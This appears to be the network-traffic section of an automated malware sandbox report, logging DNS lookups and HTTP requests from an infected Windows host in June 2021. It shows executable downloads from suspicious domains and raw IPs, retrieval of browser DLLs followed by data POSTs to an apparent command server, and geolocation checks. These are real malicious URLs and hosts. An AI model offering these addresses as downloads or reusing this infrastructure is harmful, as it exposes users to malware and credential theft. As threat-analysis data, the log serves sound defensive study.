                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
•
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 133
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:28 GMT
                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 1516
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
•
                                                                DNS
                                                                freeprivacytoolsforyou.xyz
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                freeprivacytoolsforyou.xyz
                                                                IN A
                                                                Response
                                                                freeprivacytoolsforyou.xyz
                                                                IN A
                                                                45.133.245.228
•
                                                                HEAD
                                                                http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
                                                                Remote address:
                                                                45.133.245.228:80
                                                                Request
                                                                HEAD /downloads/toolspab2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: freeprivacytoolsforyou.xyz
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:29 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 368640
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Last-Modified: Mon, 28 Jun 2021 16:04:01 GMT
                                                                ETag: "5a000-5c5d5a342b63f"
                                                                Accept-Ranges: bytes
•
                                                                GET
                                                                http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
                                                                Remote address:
                                                                45.133.245.228:80
                                                                Request
                                                                GET /downloads/toolspab2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: freeprivacytoolsforyou.xyz
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 368640
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Last-Modified: Mon, 28 Jun 2021 16:04:01 GMT
                                                                ETag: "5a000-5c5d5a342b63f"
                                                                Accept-Ranges: bytes
•
                                                                DNS
                                                                cdn.discordapp.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                cdn.discordapp.com
                                                                IN A
                                                                Response
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.129.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.135.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.133.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.130.233
                                                                cdn.discordapp.com
                                                                IN A
                                                                162.159.134.233
•
                                                                DNS
                                                                jom.diregame.live
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                jom.diregame.live
                                                                IN A
                                                                Response
                                                                jom.diregame.live
                                                                IN A
                                                                172.67.158.82
                                                                jom.diregame.live
                                                                IN A
                                                                104.21.65.45
•
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
•
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
•
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
•
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
•
                                                                HEAD
                                                                http://136.144.41.133/WW/file7.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file7.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:29 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:18:16 GMT
                                                                ETag: "122bd0-5c5d4ffa2612d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1190864
                                                                Content-Type: application/x-msdos-program
•
                                                                HEAD
                                                                http://136.144.41.133/WW/file1.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file1.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 07:24:03 GMT
                                                                ETag: "b0c00-5c5ba41def8db"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 723968
                                                                Content-Type: application/x-msdos-program
•
                                                                GET
                                                                http://136.144.41.133/WW/file2.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:37:33 GMT
                                                                ETag: "afa00-5c5d544a08d86"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 719360
                                                                Content-Type: application/x-msdos-program
•
                                                                GET
                                                                http://136.144.41.133/WW/file1.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file1.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:33 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 07:24:03 GMT
                                                                ETag: "b0c00-5c5ba41def8db"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 723968
                                                                Content-Type: application/x-msdos-program
•
                                                                HEAD
                                                                http://136.144.41.133/WW/file2.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:29 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:37:33 GMT
                                                                ETag: "afa00-5c5d544a08d86"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 719360
                                                                Content-Type: application/x-msdos-program
•
                                                                HEAD
                                                                http://136.144.41.133/WW/file8.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file8.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 18:16:16 GMT
                                                                ETag: "1c6b18-5c5c35e61788d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1862424
                                                                Content-Type: application/x-msdos-program
•
                                                                GET
                                                                http://136.144.41.133/WW/file7.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file7.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:18:16 GMT
                                                                ETag: "122bd0-5c5d4ffa2612d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1190864
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/WW/file8.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file8.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                              • flag-unknown
                                                                DNS
                                                                www.quickfastfuriousloaded.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                www.quickfastfuriousloaded.com
                                                                IN A
                                                                Response
                                                                www.quickfastfuriousloaded.com
                                                                IN A
                                                                89.221.213.3
                                                              • flag-unknown
                                                                DNS
                                                                pcfixmy-download-13.xyz
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                pcfixmy-download-13.xyz
                                                                IN A
                                                                Response
                                                                pcfixmy-download-13.xyz
                                                                IN A
                                                                104.21.46.30
                                                                pcfixmy-download-13.xyz
                                                                IN A
                                                                172.67.222.237
                                                              • flag-unknown
                                                                DNS
                                                                d.dirdgame.live
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                d.dirdgame.live
                                                                IN A
                                                                Response
                                                                d.dirdgame.live
                                                                IN A
                                                                172.67.186.79
                                                                d.dirdgame.live
                                                                IN A
                                                                104.21.59.252
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/WW/file8.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file8.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:39 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 18:16:16 GMT
                                                                ETag: "1c6b18-5c5c35e61788d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1862424
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                DNS
                                                                iphonemoney.xyz
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                iphonemoney.xyz
                                                                IN A
                                                                Response
                                                                iphonemoney.xyz
                                                                IN A
                                                                104.21.51.159
                                                                iphonemoney.xyz
                                                                IN A
                                                                172.67.182.129
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/706
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST /706 HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/freebl3.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /freebl3.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:46 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 334288
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "519d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:46 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/mozglue.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /mozglue.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 137168
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "217d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/msvcp140.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /msvcp140.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 440120
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "6b738-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/nss3.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /nss3.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 1246160
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "1303d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: HIT
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/softokn3.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /softokn3.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 144848
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "235d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/vcruntime140.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /vcruntime140.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 83784
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "14748-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 3571
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                viewport-width: 1920
                                                                Host: ip-api.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 323
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 22
                                                                X-Rl: 37
                                                              • flag-unknown
DNS flamkravmaga.com
Remote address: 8.8.8.8:53
Request
  flamkravmaga.com IN A
Response

DNS flamkravmaga.com
Remote address: 8.8.8.8:53
Request
  flamkravmaga.com IN A
Response

DNS flamkravmaga.com
Remote address: 8.8.8.8:53
Request
  flamkravmaga.com IN A
Response

DNS flamkravmaga.com
Remote address: 8.8.8.8:53
Request
  flamkravmaga.com IN A
Response

GET http://ip-api.com/json/?fields=8198
Remote address: 208.95.112.1:80
Request
  GET /json/?fields=8198 HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: ip-api.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:11 GMT
  Content-Type: application/json; charset=utf-8
  Content-Length: 57
  Access-Control-Allow-Origin: *
  X-Ttl: 0
  X-Rl: 36

GET http://ip-api.com/json/?fields=8198
Remote address: 208.95.112.1:80
Request
  GET /json/?fields=8198 HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: ip-api.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:12 GMT
  Content-Type: application/json; charset=utf-8
  Content-Length: 57
  Access-Control-Allow-Origin: *
  X-Ttl: 60
  X-Rl: 44

GET http://ip-api.com/json/?fields=8198
Remote address: 208.95.112.1:80
Request
  GET /json/?fields=8198 HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: ip-api.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:13 GMT
  Content-Type: application/json; charset=utf-8
  Content-Length: 57
  Access-Control-Allow-Origin: *
  X-Ttl: 58
  X-Rl: 43

GET http://ip-api.com/json/?fields=8198
Remote address: 208.95.112.1:80
Request
  GET /json/?fields=8198 HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: ip-api.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:14 GMT
  Content-Type: application/json; charset=utf-8
  Content-Length: 57
  Access-Control-Allow-Origin: *
  X-Ttl: 57
  X-Rl: 42

DNS iw.gamegame.info
Remote address: 8.8.8.8:53
Request
  iw.gamegame.info IN A
Response
  iw.gamegame.info IN A 172.67.200.215
  iw.gamegame.info IN A 104.21.21.221

POST http://iw.gamegame.info/report7.4.php
Remote address: 172.67.200.215:80
Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:12 GMT
  Content-Type: application/json; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  cf-request-id: 0af4f72a9600000c81b01d6000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=p9HoavhuyBK9Iw7hhue3R%2F8scnMgIZH6ev3v%2FCtcOKr7oODyVRM4Cuk85uadWyesStk56m1EFN6%2BQHyPAkO8UovXwlpJM5SYDLdt0eQLH2A6obWT6PZEgzcMXDqcAg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 666827bdb8c60c81-AMS
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://iw.gamegame.info/report7.4.php
Remote address: 172.67.200.215:80
Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:14 GMT
  Content-Type: application/json; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  cf-request-id: 0af4f732a300000c81c235b000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=T%2FPuE%2B7UuT3dbk5seymum4AKvExEoFUzLXAX%2B026mLlKDSWky%2B02%2FfMwKh9VHMWNfScVvGtselmTdzu5Xg%2F2o1Blb27fP1fjo1HA6RkzHrQQPYfo5CioY%2BTGmcqr5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 666827ca9b7d0c81-AMS
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://iw.gamegame.info/report7.4.php
Remote address: 172.67.200.215:80
Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 250
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:15 GMT
  Content-Type: application/json; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  cf-request-id: 0af4f734d900000c815cb38000000001
